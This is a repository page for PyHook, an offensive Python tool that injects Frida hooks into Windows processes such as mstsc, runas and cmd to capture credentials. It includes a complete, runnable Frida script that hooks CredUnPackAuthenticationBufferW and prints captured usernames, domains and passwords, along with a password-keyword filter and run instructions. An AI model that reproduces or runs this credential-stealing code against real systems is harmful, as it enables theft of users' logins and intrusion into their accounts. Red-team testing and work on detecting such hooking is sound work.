• Stars: 180
  • Rank: 212,118 (Top 5 %)
  • Language: Python
  • License: BSD 3-Clause "New...
  • Created: about 3 years ago
  • Updated: about 2 months ago

Repository Details

PyHook is an offensive API hooking tool written in Python, designed to capture credentials as they pass through the hooked API calls of the target process.

PyHook

PyHook is the Python implementation of my SharpHook project. It hooks various Windows APIs in order to capture the credentials that pass through them.

PyHook uses Frida to inject its dependencies into the target process.

Supported Processes

| Process | API Call | Description | Progress |
|---|---|---|---|
| mstsc | CredUnPackAuthenticationBufferW | Hooks CredUnPackAuthenticationBufferW in mstsc and outputs the username and password. | DONE |
| runas | CreateProcessWithLogonW | Hooks CreateProcessWithLogonW in runas and outputs the username, password and domain name. | DONE |
| PowerShell | CreateProcessWithLogonW | Hooks CreateProcessWithLogonW in PowerShell and outputs the username, password and domain name (e.g. Start-Process cmd -Credential X). | DONE |
| cmd | RtlInitUnicodeStringEx | Hooks RtlInitUnicodeStringEx in cmd and outputs strings that match specific filters (e.g. "-p", "password"). | DONE |
| MobaXterm | CharUpperBuffA | Hooks CharUpperBuffA in MobaXterm and outputs credentials for RDP and SSH logins. | DONE |
| explorer (UAC prompt) | CredUnPackAuthenticationBufferW | Hooks CredUnPackAuthenticationBufferW in explorer and outputs the username, password and domain name. | DONE |
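As an added example (not PyHook's own code, nor code from the SharpHook project), the following Frida host script shows what one row of the table amounts to in practice. It attaches to a process by name (mstsc.exe is assumed here), hooks CredUnPackAuthenticationBufferW from credui.dll, and reads the decoded username, domain and password out of the caller's output buffers in onLeave, because those buffers hold nothing useful until the call returns. It also carries a small keyword filter of the kind the cmd/RtlInitUnicodeStringEx row relies on, where every command-line token flows through the hook and only password-looking strings are worth reporting. The process name, the helper names and the exact output format are assumptions of this example; the filter keywords are the two the table gives.

```python
"""
Added example, not PyHook's own code: a minimal Frida host script that hooks
credui!CredUnPackAuthenticationBufferW in a target chosen by name and reports
the decoded credentials. The message handling and the keyword filter are pure
Python, so they can be exercised without a live target or Frida installed.
"""
import sys

# Frida (JavaScript) side. args[] indexes follow the documented signature:
#   BOOL CredUnPackAuthenticationBufferW(dwFlags, pAuthBuffer, cbAuthBuffer,
#        pszUserName, pcchMaxUserName, pszDomainName, pcchMaxDomainName,
#        pszPassword, pcchMaxPassword)
# The three string buffers are output parameters: the hook saves their pointers
# in onEnter and only reads them in onLeave, after the callee has filled them.
HOOK_JS = r"""
const target = Process.getModuleByName('credui.dll')
    .getExportByName('CredUnPackAuthenticationBufferW');

Interceptor.attach(target, {
    onEnter(args) {
        this.user = args[3];
        this.domain = args[5];
        this.password = args[7];
    },
    onLeave(retval) {
        if (retval.toInt32() === 0) {
            return;  // FALSE: the buffers were not populated (e.g. too small)
        }
        const str = p => (p.isNull() ? null : p.readUtf16String());
        send({
            api: 'CredUnPackAuthenticationBufferW',
            username: str(this.user),
            domain: str(this.domain),
            password: str(this.password),
        });
    },
});
"""

# Keywords for a high-volume string hook such as cmd!RtlInitUnicodeStringEx,
# where every command-line token passes through and most are noise.
DEFAULT_FILTERS = ("-p", "password")


def looks_like_credential(text, filters=DEFAULT_FILTERS):
    """Case-insensitive keyword filter; returns the matched keyword or None."""
    lowered = text.lower()
    for keyword in filters:
        if keyword.lower() in lowered:
            return keyword
    return None


def parse_message(message):
    """Reduce a Frida message envelope to its credential payload.

    Frida delivers {'type': 'send', 'payload': ...} for send() and
    {'type': 'error', 'description': ..., ...} for script exceptions.
    Returns the payload dict, or None for anything that is not a credential.
    """
    if message.get("type") == "error":
        print("[!] script error: %s" % message.get("description"), file=sys.stderr)
        return None
    payload = message.get("payload")
    if not isinstance(payload, dict) or "api" not in payload:
        return None
    return payload


def format_credential(payload):
    """Render one captured credential as a single line: [api] DOMAIN\\user:password."""
    domain = payload.get("domain") or ""
    user = payload.get("username") or ""
    identity = "%s\\%s" % (domain, user) if domain else user
    return "[%s] %s:%s" % (payload["api"], identity, payload.get("password") or "")


def run(process_name="mstsc.exe"):
    """Attach to a running process and stream captured credentials until EOF/Ctrl-C."""
    import frida  # imported here so the pure-Python helpers work without Frida installed

    session = frida.attach(process_name)
    script = session.create_script(HOOK_JS)

    def on_message(message, _data):
        payload = parse_message(message)
        if payload is not None:
            print(format_credential(payload))

    script.on("message", on_message)
    script.load()
    print("[*] hooked CredUnPackAuthenticationBufferW in %s; waiting..." % process_name)
    try:
        sys.stdin.read()  # block so the hook stays loaded while the target runs
    except KeyboardInterrupt:
        pass
    finally:
        session.detach()


if __name__ == "__main__":
    run(sys.argv[1] if len(sys.argv) > 1 else "mstsc.exe")
```

Run it on a Windows host where Frida is installed and the target is already running, with a token that can open the target process (`python hook_credui.py mstsc.exe`); the hook only fires when the target actually calls the API, i.e. when the user submits the credential prompt. The same onEnter/onLeave split applies to CreateProcessWithLogonW, except that there the username, domain and password are input parameters (args[0] to args[2]) and can be read directly in onEnter. Frida's injection is not stealthy: it drops an agent DLL and creates a thread in the target, which is exactly what EDR process-injection detections look for.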

Demo

Link to my blog post covering this topic: https://ilankalendarov.github.io/posts/offensive-hooking